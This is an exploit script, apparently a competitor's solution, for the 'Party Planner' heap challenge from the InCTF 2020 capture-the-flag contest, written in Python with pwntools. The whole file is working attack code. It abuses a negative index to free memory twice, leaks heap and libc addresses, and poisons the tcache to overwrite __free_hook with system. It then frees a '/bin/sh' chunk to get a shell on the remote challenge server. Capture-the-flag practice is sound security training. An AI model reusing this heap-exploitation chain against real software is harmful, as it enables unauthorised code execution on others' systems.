Party Planner - InCTF 2020

xpl.py

#!/usr/bin/env python3
from pwn import *

context.terminal = ['tmux', 'sp', '-h']
#context.log_level = 'DEBUG'

elf = ELF("./chall")
LOCAL = False

def create_house(name, size, description):
    io.recvuntil("Choice >> ")
    io.sendline("1")
    io.recvuntil("House : ")
    io.sendline(name)
    io.recvuntil("House : ")
    io.sendline(str(size))
    io.recvuntil("description : ")
    io.sendline(description)

def create_person(name, size, details):
    io.recvuntil("Choice >> ")
    io.sendline("2")
    io.recvuntil("Person : ")
    io.sendline(name)
    io.recvuntil("Person : ")
    io.sendline(str(size))
    io.recvuntil("details : ")
    io.sendline(details)

def add_person(number, house):
    io.recvuntil("Choice >> ")
    io.sendline("3")
    io.recvuntil("number : ")
    io.sendline(str(number))
    io.recvuntil("? : ")
    io.sendline(str(house))

def remove_person(number, house):
    io.recvuntil("Choice >> ")
    io.sendline("4")
    io.recvuntil("? : ")
    io.sendline(str(house))
    io.recvuntil("number : ")
    io.sendline(str(number))

def show_house(house):
    io.recvuntil("Choice >> ")
    io.sendline("5")
    io.recvuntil("? : ")
    io.sendline(str(house))

def show_person(number, house):
    io.recvuntil("Choice >> ")
    io.sendline("6")
    io.recvuntil("? : ")
    io.sendline(str(house))
    io.recvuntil("number : ")
    io.sendline(str(number))

def party(house):
    io.recvuntil("Choice >> ")
    io.sendline("7")
    io.recvuntil("? : ")
    io.sendline(str(house))

def destroy_house(house):
    io.recvuntil("Choice >> ")
    io.sendline("8")
    io.recvuntil("? : ")
    io.sendline(str(house))

if LOCAL == True:
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec = False)
    io = process(elf.path)
else:
    libc = ELF("./libc.so.6", checksec = False)
    io = remote("35.245.143.0", 5555)

create_house("", 0x10, "")
create_house("", 0x10, "")
create_person("", 0x100, "")
add_person(0, 0)
show_person(0, 0)

remove_person(-4294967294, 0)
create_person("", 0x100, "")
add_person(0, 1)

for _ in range(8):
    create_person("", 0x100, "")
    add_person(0, 0)

for i in range(1, 9):
    remove_person(i, 0)

remove_person(0, 0)
show_house(1)
io.recvuntil("Person 0  ")
heap_leak = u64(io.recvuntil(" with", drop = True).ljust(8, b"\x00"))
tpt_struct = heap_leak - 0xd80
io.recvuntil(" details  ")
leak = u64(io.recvuntil("\n ", drop = True).ljust(8, b"\x00"))
libc.address = leak - 0x1e4ca0

log.success("Leaked heap address: " + hex(heap_leak))
log.info("Heap tcache_perthread_struct address: " + hex(tpt_struct))
log.success("Leaked GLIBC arena address: " + hex(leak))
log.info("GLIBC base address: " + hex(libc.address))

create_person("", 0x30, "")
add_person(0, 0)
create_person("", 0x50, "")
add_person(0, 0)
show_person(0, 0)

remove_person(-4294967294, 0)
remove_person(1, 0)

create_person("", 0x30, b"\x00" * 0x20 + p64(tpt_struct) + p64(0x1) + p8(0x1))
add_person(0, 1)
remove_person(0, 0)

create_person("", 0x240, b"\x00" * 0x60 + p64(libc.sym["__free_hook"] - 0x10))
create_person("", 0x50, b"/bin/sh".ljust(0x10, b"\x00") + p64(libc.sym["system"]))

add_person(1, 0)
remove_person(0, 0)

io.interactive()
io.close()